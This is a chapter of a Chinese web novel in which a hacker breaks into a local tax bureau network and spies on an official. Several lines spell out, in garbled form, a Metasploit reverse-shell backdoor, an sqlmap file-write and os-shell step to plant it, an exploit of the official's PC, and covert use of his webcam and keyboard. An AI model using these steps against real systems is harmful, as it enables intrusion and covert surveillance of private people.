別說我是黑客 第十一章內網滲透

    嗅探,是個很古老的技術,要知道在以太網中,所有的通訊都是廣播的,也就是說通常在同一個網段的所有網絡接口都可以訪問在物理媒體上傳輸的所有數據,而每一個網絡接口都有一個唯一的硬件地址,這個硬件地址也就是網卡的mac地址,大多數系統使用48比特的地址,這個地址用來表示網絡中的每一個設備,一般來說每一塊網卡上的mac地址都是不同的,每個網卡廠家得到一段地址,然後用這段地址分配給其生產的每個網卡一個地址。在硬件地址和ip地址間使用arp和rarp協議進行相互轉換。

    正常狀態下,網卡會根據基於osi模型的tcp/ip協議,接受和發送只和自己mac或者是ip相關的數據,可一旦網卡處在了另一種混雜模式的時候,它會接受任何一個經過它的廣播數據包,如果在加上arp網關欺騙,那麼捕獲到的數據將是整個交換機下主機的通信數據,根據網絡傳輸協議的編碼原則,這些數據在沒有加密的情況下,是很容易進行分析的,而且數據報文也是明碼顯示的。

    腦中想着嗅探的原理,淼風在網管李志的注視目光中,再次坐在了19號機前。

    打開自己臨時註冊的郵箱,看到附件大小不定的十幾封郵件,淼風握了握雙手,嘴角一動,開始分析數據。

    時間悄然流失,淼風抽着煙,靠在椅子上,滾動着鼠標,半眯着眼睛查看着一封封凌亂的數據郵件,同時腦中同步進行着數據分析。

    十幾分鐘後,淼風坐直了身子,伸出被他放進口袋取暖的左手,開始敲打鍵盤。

    新建的txt文檔中,涉及地稅局副局長陳昇的信息被羅列了出來。

    陳昇,地稅局副局長,1月14日晚上九點將參加由市局統籌安排的領導見面會,秘書姓名:宋雲。

    手機號碼:130xxxx9987,內線座機8971,辦公電腦ip:10.3.3.97。

    看着從龐大嗅探數據中捕獲的簡短訊息,淼風吐了口氣,再次安裝了虛擬機,並加載了自己的linux_live_cd,啟動sqlmap,用昨晚相同的方式進入了地稅局web服務器。

    啟動metasploit,payload_windows/meterpreter/reverse_tcp_lhost=星空網吧外網ip_lport=443_r_|_msfencode–b_–t_exe_–o_root/desktop/fox.exe生成反彈鏈接後門。

    ifconfig查看了一下本地鏈接ip網關地址,瀏覽器打開網關,看到tp標識的時候,淼風點了點頭,直接通過幾年後tp的路由web後門將本機內網ip設置成了dmz主機(將內網主機所有端口全部映射到外網)。

    sqlmap.py_-u_"dishuijuguanfangwebzhurudian"--file-write_"/root/desktop/fox.exe"--file-dest_"c:/windows/temp/fox.exe"_-v_1將反彈後門寫入地稅局官網web服務器的windows下的temp目錄,文件名為fox.exe


    sqlmap添加--os-shell,通過shell執行fox.exe,幾秒中之後metasploit顯示成功,反彈回一個meterpreter的shell。

    namp_10.3.3.97,返回端口開發情況135,448,139……,隨便從metasploit中找了一windows的exploit,對10.3.3.97溢出!getshell成功!

    陳昇主機被拿下!羅列了一下主機的硬件信息後,讓淼風發現了一個有意思的東西,陳昇的主機裝着耳麥和攝像頭!「這下我可以看一下你工作的時候都在幹什麼了!不過不急,讓我看看你的電腦上都放着什麼東西。」

    吐了口氣,淼風開始羅列陳昇電腦上的文件,計劃書丟棄,工作安排丟棄,「這個是……」看着以「重要文件」命名的文件中顯示的三百多個以avi後綴名的文件,淼風眉頭動了一下。調用本地視頻播放軟件打開之後,一個穿着三點的半裸女人出現在了淼風屏幕上。

    就在這個時候因為好奇,李志來的了淼風身旁,瞄過來的視線恰巧看到了同樣的畫面。「這個傢伙大白天的看這些東西,倒是有幾分膽色。」輕笑了一聲,李志回身回到了自己網管的位置上。

    大白天的看**,李志心裏肯定了淼風並不是什麼黑客,同時也不有的鬱悶起來,cs的技術他還要再練啊,秋水一個不大的縣城都臥虎藏龍,不努力恐怕不行了。

    因為猛然見跳出的畫面,愣神的淼風,並沒有發現李志的動作。吸了口氣,將畫面關掉,淼風不由低聲咒罵了一聲陳昇,心裏更是對搞定陳昇多出了一份沒來由的急切。

    再次回到陳昇電腦的桌面文件夾,淼風隨意的打開了「工作安排」的word文件。

    看到1月14號晚上11點特別活動不必回家的備註時,淼風愣了。「這是什麼意思?」想了幾分鐘,發現根本想不通後,淼風打開了陳昇主機上的視頻攝像頭,他想看看這個時候的陳昇到底在幹嘛。

    一個燙了捲髮,帶着銀色邊框的圓臉女人,突兀的出現在了屏幕上,讓淼風有些意外的愣了一下。眼睛猛地一閃,淼風雙手一動,暫時接管了陳昇主機鍵盤的並快速的按下了截屏鍵,截屏鍵prtscsysrq彈起的那一刻,淼風退出了鍵盤接管。

    坐在陳昇電腦前的宋雲,眉頭動了動,她發現自己剛剛準備敲打的幾個字錯了一個。有些無奈的再次刪除,重新敲到了一遍,她似乎根本就沒有感覺到鍵盤在某一刻並不屬於她。

    看着截屏下來的屏幕圖片,淼風終於搞懂了那句備註到底是什麼意思了。因為宋雲正在操作的文件就是「工作安排」。摸了摸鼻子,淼風不僅有點慶幸自己的運氣了,「如果我是在之前打開,word十分鐘自動保存的功能,或許保存的是之前的文件。」

    這句話是宋雲操作陳昇的電腦留下的,想來兩人的關係一定不一般,這個「工作安排」的word文件,一定是兩人進行某種交流時使用的工具。

    再次看了視頻中的宋雲一眼,淼風覺得自己有必要去地稅局走一趟了,「不過在去之前,我還得準備一些東西。」;



  
相關:  黑客之城市獵人    我成了六零後  最強改造  御鬼者傳奇  逆劍狂神  
(快捷鍵←)上一章 ↓返回最新章節↓ 下一章 (快捷鍵→)
 
版權聲明: 飛速中文網別說我是黑客第十一章內網滲透所有小說、電子書均由會員發表或從網絡轉載,如果您發現有任何侵犯您版權的情況,請立即和我們聯繫,我們會及時作相關處理,聯繫郵箱請見首頁底部。
最新小說地圖
 

html|sitemap|shenma-sitemap|shenma-sitemap-new|sitemap50000|map|map50000

0.0354s 4.0228MB

搜"別說我是黑客"
360搜"別說我是黑客"